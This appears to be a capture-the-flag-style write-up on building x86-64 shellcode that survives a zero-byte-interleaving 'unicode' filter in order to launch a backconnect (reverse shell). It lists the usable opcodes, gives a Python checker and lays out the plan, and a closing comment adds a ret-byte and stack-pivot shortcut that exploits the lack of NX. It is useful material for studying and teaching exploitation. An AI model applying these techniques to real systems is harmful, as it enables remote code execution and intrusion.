1. We can do all kinds of arithmetic with al, eax and [rax]:
20 00 and [rax], al
2B 00 sub eax, [rax]
34 00 xor al, 0
<...>
All of that is for the most part useless: both operands
refer to parts of rax, and the arithmetic only ever works with 0.
2. We can push and pop virtually any register!
50 push rax
54 push rsp
59 pop rcx
5E pop rsi
<...>
That means we can freely get any values from the stack,
and also move values from one register to another.
Also we can push 0 :)
6A 00 push 0
3. We can dereference a dword:
63 00 movsxd eax, dword ptr [rax]
4. We can do dereferenced addition with all kinds of registers:
00 2A add [rdx], ch
00 53 00 add [rbx+0], dl
<....>

… and that’s actually pretty much it.
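The reason the list is so short can be sketched in a few lines of Python. This is only an illustration and rests on an assumption: that the "unicoding" step widens each input byte to two bytes by appending a 0x00, as UTF-16LE does for 8-bit characters. The helper names `widen` and `survives_widening` are hypothetical; the opcode bytes are the ones from the list above.

```python
def widen(payload: bytes) -> bytes:
    """Append a zero byte after every input byte (assumed model of the unicoding step)."""
    return b"".join(bytes([b, 0]) for b in payload)


def survives_widening(code: bytes) -> bool:
    """True if every odd-offset byte is zero, i.e. widen() could have produced this code."""
    return len(code) % 2 == 0 and all(b == 0 for b in code[1::2])


# Encodings taken from the list above.
and_rax_al = bytes.fromhex("2000")             # and [rax], al
push_zero = bytes.fromhex("6a00")              # push 0
push_rax_then_add = bytes.fromhex("50005300")  # push rax ; add [rbx+0], dl

# An ordinary instruction that does not fit the pattern.
mov_rax_rdx = bytes.fromhex("4889d0")          # mov rax, rdx

print(survives_widening(and_rax_al))         # fits the pattern
print(survives_widening(push_rax_then_add))  # one-byte opcode followed by a 00-led add
print(survives_widening(mov_rax_rdx))        # does not fit
```

Note how a one-byte instruction such as push rax leaves the following 0x00 as the start of the next instruction, which is why the 00-prefixed add forms from item 4 matter: they absorb the zero bytes.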

So what can we do with those opcodes to execute our fancy backconnect shellcode?

Prerequisites

When our shellcode is invoked, we have two very useful prerequisites to consider:

1. rdx points to the buffer with our shellcode (shellcode is executed with call rdx)

2. When the execution of the shellcode starts, [esp+0x1C] contains the length of the original, non-unicoded string.

The plan is:

1. Get rdx pointing to the end of the shellcode

2. Write our backconnect there.
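The target address in step 1 follows from the two prerequisites. A minimal sketch of the arithmetic, assuming that every byte of the original string occupies two bytes in the buffer once unicoded and that the stored length counts only the original bytes (both are assumptions, as are the function name and the example values):

```python
def shellcode_end(buffer_addr: int, original_len: int, bytes_per_char: int = 2) -> int:
    """Address of the first byte past the unicoded shellcode.

    buffer_addr  -- value of rdx on entry (start of the buffer)
    original_len -- value stored at [esp+0x1C] (length before unicoding)
    """
    return buffer_addr + original_len * bytes_per_char


# Hypothetical values, purely for illustration.
start = 0x602000
length = 0x180
print(hex(shellcode_end(start, length)))
```

The hard part is not the arithmetic itself but performing it with the handful of opcodes listed above.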

This way, when the unicoded shellcode finishes executing, the backconnect shellcode takes over immediately and we don’t have to worry about transferring control. Also, that’s the only way :) We don’t have a jmp or a ret.

Oh that rich opcode variety

Let’s improvise with what we have and make rdx point to the end of the shellcode buffer.

Actually, that is not the only way… The binary doesn’t have NX, so the memory allocated with malloc has RWX permissions. And when the execution of the shellcode starts, [esp+0x20] contains the pointer to the malloc buffer. So you just need to generate a single return byte (C3) at the end of the unicode shellcode (much simpler than generating the entire backconnect shellcode) and adjust ESP to point to mallocbuffer + X. This way you need less than 400 bytes for the exploit payload.